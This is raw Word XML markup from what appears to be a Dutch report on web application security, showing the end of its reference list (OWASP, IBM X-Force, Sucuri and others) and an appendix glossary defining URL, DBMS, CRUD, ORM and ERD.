          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://sucuri.net/website-security/Reports/Sucuri-Website-Hacked-Report-2016Q1.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0BB4221A" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15C703FD" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00B534F2" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>IBM Security (Maart, 2017). IBM X-Force Threat Intelligence Index 2017. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694A0E62" w14:textId="0EF0C985" w:rsidR="00886D84" w:rsidRDefault="00B534F2" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId123" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://assets.documentcloud.org/documents/3527813/IBM-XForce-Index-2017-FINAL.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="188D0774" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BEDD95F" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00B534F2" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve">IBM Security (2014). IBM X-Force Threat Intelligence Quarterly </w:t>
      </w:r>
      <w:r w:rsidR="00FF0482" w:rsidRPr="00CC5BFC">
        <w:t>2Q 2014. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5916B192" w14:textId="5EB8D313" w:rsidR="00886D84" w:rsidRDefault="00FF0482" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B534F2" w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId124" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http://essextec.com/wp-content/uploads/2015/09/xforcereport2q2014.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7563B5F8" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73865744" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00C674E1" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP (2017). OWASP Top Ten Project, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5BFC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Geraadpleegd</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5BFC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652D4323" w14:textId="03CEC3F8" w:rsidR="00886D84" w:rsidRDefault="00C674E1" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5BFC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId125" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D48DA37" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E40A2BD" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="004E2F5B" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Sectoolmarket (2016). Price and feature Comparison of Web Application Scanners. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147571E1" w14:textId="00AFF57F" w:rsidR="00886D84" w:rsidRDefault="004E2F5B" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C674E1" w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId126" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http://www.sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3EE831D8" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7969AB87" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="004E2F5B" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Voogd K. (2011). Het Web: Web 1.0, Web 2.0, Web 3.0. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789E883F" w14:textId="65E64231" w:rsidR="00886D84" w:rsidRDefault="004E2F5B" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId127" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http://pc-en-internet.infonu.nl/geschiedenis/84250-het-web-web-10-web-20-web-30.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6CCCF858" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D86499C" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00797560" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>OWASP (2017). Vulnerability Scanning Tools. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE70FA8" w14:textId="33C2D085" w:rsidR="00886D84" w:rsidRDefault="00797560" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId128" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0E602FBF" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53C658E7" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00797560" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Acunetix (2017) Is your website hackable? Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A509824" w14:textId="7B4D86E8" w:rsidR="00886D84" w:rsidRDefault="00797560" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId129" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.acunetix.com/resources/wvsbrochure.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B147BE5" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BE1BAEF" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00797560" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Schäferhoff N. (2016). 13 Surprising Wordpress Statistics. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E97D83" w14:textId="1DCD4C40" w:rsidR="00886D84" w:rsidRDefault="00797560" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId130" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://torquemag.io/2016/10/13-surprising-wordpress-statistics-updated-2016/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="67F2FC9A" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="683D6F2F" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00797560" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Wright K. Ithemes (2017). 5 Common WordPress Security Issues</w:t>
      </w:r>
      <w:r w:rsidR="00315FD7" w:rsidRPr="00CC5BFC">
        <w:t>. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0880DBAA" w14:textId="17DF567D" w:rsidR="00886D84" w:rsidRDefault="00315FD7" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00797560" w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId131" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://ithemes.com/2017/01/16/wordpress-security-issues/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FD1997A" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E05A8EA" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00315FD7" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Techempower (2017). Web Framework Benchmarks. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5277D0C3" w14:textId="6A2DF8FD" w:rsidR="00886D84" w:rsidRDefault="00315FD7" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId132" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.techempower.com/benchmarks/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56F9CEFC" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00B5F5FA" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00315FD7" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Sitepoint (2015). The Best PHP Framework for 2015: SitePoint Survey Results. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5990B808" w14:textId="5FAA3928" w:rsidR="00886D84" w:rsidRDefault="00315FD7" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId133" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.sitepoint.com/best-php-framework-2015-sitepoint-survey-results/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48868884" w14:textId="77777777" w:rsidR="0030691F" w:rsidRPr="00CC5BFC" w:rsidRDefault="0030691F" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="205F9C5C" w14:textId="77777777" w:rsidR="0030691F" w:rsidRDefault="00315FD7" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>WASC (2011). Threat Classification. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF0FA07" w14:textId="0EFE38C9" w:rsidR="00886D84" w:rsidRPr="00CC5BFC" w:rsidRDefault="00315FD7" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId134" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http://projects.webappsec.org/w/page/13246978/Threat%20Classification</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15D423A6" w14:textId="77777777" w:rsidR="00CC5BFC" w:rsidRDefault="00CC5BFC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1769B4EE" w14:textId="0D82562A" w:rsidR="00886D84" w:rsidRPr="00DA22A1" w:rsidRDefault="00886D84">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA22A1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2EC317" w14:textId="66B55516" w:rsidR="0022176D" w:rsidRDefault="007460D6" w:rsidP="001876C7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253243392" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3018B670" wp14:editId="27BF92AD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-897890</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-897890</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="844" name="Rectangle 8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A179F" id="Rectangle 844" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.7pt;margin-top:-70.65pt;width:25pt;height:1031.7pt;z-index:-2500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z1c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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009B6571">
        <w:t>Bijlage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3410B13D" w14:textId="02B0A920" w:rsidR="00F57BDD" w:rsidRDefault="00EF688B" w:rsidP="001876C7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Glossary</w:t>
      </w:r>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Unified Resource Locator, een adres van website op het internet</w:t>
      </w:r>
      <w:r w:rsidR="0020140F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CA9A16" w14:textId="318F6C41" w:rsidR="00911E70" w:rsidRDefault="00463978" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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15310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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databasemanagementsystemen, applicatie waarmee SQL databases gemaakt kunnen worden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC19031" w14:textId="034DC486" w:rsidR="009A7E14" w:rsidRPr="009A7E14" w:rsidRDefault="00422628" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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56FAC497" w14:textId="67B4D0B6" w:rsidR="008C097F" w:rsidRPr="008C097F" w:rsidRDefault="00AB602D" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CRUD</w:t>
      </w:r>
      <w:r w:rsidR="008C097F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="001C3ECA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C3ECA" w:rsidRPr="001C3ECA">
        <w:t>CRUD staat voor Create, Read, Update, Delete</w:t>
      </w:r>
      <w:r w:rsidR="001C3ECA">
        <w:t>. Dit zijn de database evenementen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6022B596" w14:textId="77777777" w:rsidR="00550021" w:rsidRPr="00550021" w:rsidRDefault="008C097F" w:rsidP="00550021">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C097F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ORM</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="001C3ECA">
        <w:t xml:space="preserve"> ORM staat voor Object Relation Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462C05C7" w14:textId="4445E7AA" w:rsidR="00F241F6" w:rsidRPr="00550021" w:rsidRDefault="00550021" w:rsidP="00550021">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ERD</w:t>
      </w:r>
      <w:r w:rsidRPr="00550021">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>ERD staat voor Entity Relationship Diagram</w:t>
      </w:r>
      <w:r w:rsidR="00F241F6">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4167C84A" w14:textId="66617DBA" w:rsidR="00487AE4" w:rsidRDefault="007460D6" w:rsidP="00F241F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253245440" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="55E11327" wp14:editId="52D0515A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-902335</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-892810</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="845" name="Rectangle 8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A55C0" id="Rectangle 845" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.05pt;margin-top:-70.25pt;width:25pt;height:1031.7pt;z-index:-2500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l9J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kJ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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="457B9906" w14:textId="40A3AABC" w:rsidR="00487AE4" w:rsidRPr="002E2EF6" w:rsidRDefault="000876DB" w:rsidP="003527DB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="002E2EF6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252359680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="562FF535" wp14:editId="7210ED94">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-193040</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>74295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135">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60D6" w:rsidRPr="002E2EF6">
        <w:t>ERD MODEL</w:t>
      </w:r>
      <w:r w:rsidR="00487AE4" w:rsidRPr="002E2EF6">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFD6E81" w14:textId="2CB7A234" w:rsidR="00487AE4" w:rsidRPr="00537717" w:rsidRDefault="007460D6" w:rsidP="003527DB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253247488" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="423F6092" wp14:editId="67BF1D7D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-904875</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-897890</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
